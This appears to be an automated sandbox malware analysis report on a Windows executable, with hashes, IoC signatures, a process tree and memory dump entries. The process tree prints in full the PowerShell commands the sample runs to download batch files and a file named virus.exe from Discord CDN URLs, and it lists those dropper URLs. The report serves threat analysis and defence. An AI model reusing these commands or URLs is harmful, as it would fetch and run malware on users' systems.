f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762

Analysis

max time kernel
118s
max time network
125s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26/01/2024, 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Size

108KB
MD5

5a0002d2a22ceca62c674539b7454ae4
SHA1

8aebc5ca26daace2b5cef162500ffe515fc601e1
SHA256

f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
SHA512

083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
SSDEEP

1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	2304	powershell.exe
6	2304	powershell.exe
8	2136	powershell.exe
9	2136	powershell.exe
11	2836	powershell.exe
12	2836	powershell.exe
14	2928	powershell.exe
15	2928	powershell.exe
17	1696	powershell.exe
18	1696	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2304	powershell.exe
2712	powershell.exe
2136	powershell.exe
3024	powershell.exe
2836	powershell.exe
2764	powershell.exe
2928	powershell.exe
1936	powershell.exe
1696	powershell.exe
1788	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2972	2168	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	27
PID 2168 wrote to memory of 2972	2168	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	27
PID 2168 wrote to memory of 2972	2168	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	27
PID 2168 wrote to memory of 2972	2168	d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe	27
PID 2972 wrote to memory of 2304	2972	cmd.exe	29
PID 2972 wrote to memory of 2304	2972	cmd.exe	29
PID 2972 wrote to memory of 2304	2972	cmd.exe	29
PID 2972 wrote to memory of 2712	2972	cmd.exe	30
PID 2972 wrote to memory of 2712	2972	cmd.exe	30
PID 2972 wrote to memory of 2712	2972	cmd.exe	30
PID 2972 wrote to memory of 2136	2972	cmd.exe	31
PID 2972 wrote to memory of 2136	2972	cmd.exe	31
PID 2972 wrote to memory of 2136	2972	cmd.exe	31
PID 2972 wrote to memory of 3024	2972	cmd.exe	32
PID 2972 wrote to memory of 3024	2972	cmd.exe	32
PID 2972 wrote to memory of 3024	2972	cmd.exe	32
PID 2972 wrote to memory of 2836	2972	cmd.exe	33
PID 2972 wrote to memory of 2836	2972	cmd.exe	33
PID 2972 wrote to memory of 2836	2972	cmd.exe	33
PID 2972 wrote to memory of 2764	2972	cmd.exe	34
PID 2972 wrote to memory of 2764	2972	cmd.exe	34
PID 2972 wrote to memory of 2764	2972	cmd.exe	34
PID 2972 wrote to memory of 2928	2972	cmd.exe	35
PID 2972 wrote to memory of 2928	2972	cmd.exe	35
PID 2972 wrote to memory of 2928	2972	cmd.exe	35
PID 2972 wrote to memory of 1936	2972	cmd.exe	36
PID 2972 wrote to memory of 1936	2972	cmd.exe	36
PID 2972 wrote to memory of 1936	2972	cmd.exe	36
PID 2972 wrote to memory of 1696	2972	cmd.exe	37
PID 2972 wrote to memory of 1696	2972	cmd.exe	37
PID 2972 wrote to memory of 1696	2972	cmd.exe	37
PID 2972 wrote to memory of 1788	2972	cmd.exe	40
PID 2972 wrote to memory of 1788	2972	cmd.exe	40
PID 2972 wrote to memory of 1788	2972	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
"C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\68E1.tmp\68E2.tmp\68E3.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\68E1.tmp\68E2.tmp\68E3.bat

Filesize
18KB

MD5
da14901fbd42e828503cc0f75847af52

SHA1
db49087447161b0fc6ee882dfc6906d1a9d1b96e

SHA256
8c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f

SHA512
8e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K4ZS9Z1WFX21BOULULSL.temp

Filesize
7KB

MD5
57052386a785e7b798274f09230d5923

SHA1
e91aef4bcac9cf3ad51f3fe88c3650e629c6cf1a

SHA256
2c20859ce8ef861aa1e4f854619ee9c4602d753255208b01882c17c8ad19c3e9

SHA512
9c7d8fee4fa2b5937abb6e9a97dd3eb21cca5a6204eccf877f62f751abe7b3644a435eb28cc9e252a7f76b5e163da1eba1f12995730211cb990a946c45b1b448

Download Submit
memory/1936-108-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1936-107-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/1936-105-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/1936-106-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2136-49-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2136-48-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2136-43-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-46-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2136-45-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2136-44-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2136-47-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2136-50-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-22-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-15-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-11-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-10-0x0000000002050000-0x0000000002058000-memory.dmp

Filesize
32KB

Download
memory/2304-9-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-8-0x000000001B410000-0x000000001B6F2000-memory.dmp

Filesize
2.9MB

Download
memory/2304-12-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-13-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-14-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-21-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-16-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-20-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-19-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2304-18-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-17-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2712-36-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2712-33-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2712-35-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2712-34-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2712-32-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2712-31-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2712-28-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2712-29-0x0000000002560000-0x0000000002568000-memory.dmp

Filesize
32KB

Download
memory/2712-30-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2764-84-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2764-86-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2764-83-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2764-82-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2764-81-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/2764-85-0x0000000002A6B000-0x0000000002AD2000-memory.dmp

Filesize
412KB

Download
memory/2836-69-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-70-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/2836-71-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-72-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/2836-73-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/2836-74-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/2836-75-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-97-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2928-96-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2928-99-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-93-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2928-92-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-95-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2928-98-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2928-94-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/3024-61-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/3024-60-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/3024-62-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/3024-59-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/3024-58-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download
memory/3024-57-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/3024-56-0x000007FEF4F30000-0x000007FEF58CD000-memory.dmp

Filesize
9.6MB

Download